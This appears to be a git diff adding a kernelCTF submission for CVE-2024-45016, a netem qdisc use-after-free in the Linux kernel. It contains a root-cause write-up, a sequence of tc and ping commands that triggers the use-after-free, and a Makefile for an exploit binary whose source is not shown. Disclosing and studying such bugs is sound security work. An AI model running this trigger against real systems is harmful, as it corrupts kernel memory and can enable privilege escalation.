Add kernelCTF CVE-2024-45016_lts_cos_mitigation

pocs/linux/kernelctf/CVE-2024-45016_lts_cos_mitigation/docs/vulnerability.md

@@ -0,0 +1,22 @@
+A vulnerability in the traffic control subsystem's netem qdisc (`CONFIG_NET_SCH_NETEM ` in the kernel config) can lead to a use-after-free. The commit `5845f706388a ("net:netem: fix skb length BUG_ON in __skb_to_sgvec")` introduced the bug by making `netem_enqueue()` always return `NET_XMIT_SUCCESS` when a packet is duplicated, which can cause the parent qdisc's `q.qlen` to be mistakenly incremented. When this happens `qlen_notify()` may be skipped on the parent during destruction, leaving a dangling pointer for some classful qdiscs like DRR. There are two ways for this to happen:
+
+- If the duplicated packet is dropped by `rootq->enqueue()` and then the original packet is also dropped.
+- If `rootq->enqueue()` sends the duplicated packet to a different qdisc and the original packet is dropped.
+
+In both cases `NET_XMIT_SUCCESS` is returned even though no packets are enqueued at the netem qdisc. 
+
+The bug was present in kernel versions `4.14-6.11` and was fixed by commit `c07ff8592d57 (netem: fix return value if duplicate enqueue fails)`. 
+
+Commands for triggering the UaF:
+
+```
+ip link set lo up
+tc qdisc add dev lo parent root handle 1: drr
+tc filter add dev lo parent 1: basic classid 1:1
+tc class add dev lo parent 1: classid 1:1 drr
+tc qdisc add dev lo parent 1:1 handle 2: netem limit 0 dup 100
+ping -c1 -W0.01 localhost # Trigger bug
+tc class del dev lo classid 1:1
+tc class add dev lo parent 1: classid 1:1 drr
+ping -c1 -W0.01 localhost # UaF
+```

pocs/linux/kernelctf/CVE-2024-45016_lts_cos_mitigation/exploit/cos-109-17800.218.76/Makefile

@@ -0,0 +1,7 @@
+CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static -D COS
+
+exploit: exploit.c
+	gcc $(CFLAGS) -o $@ $<
+
+run:
+	./exploit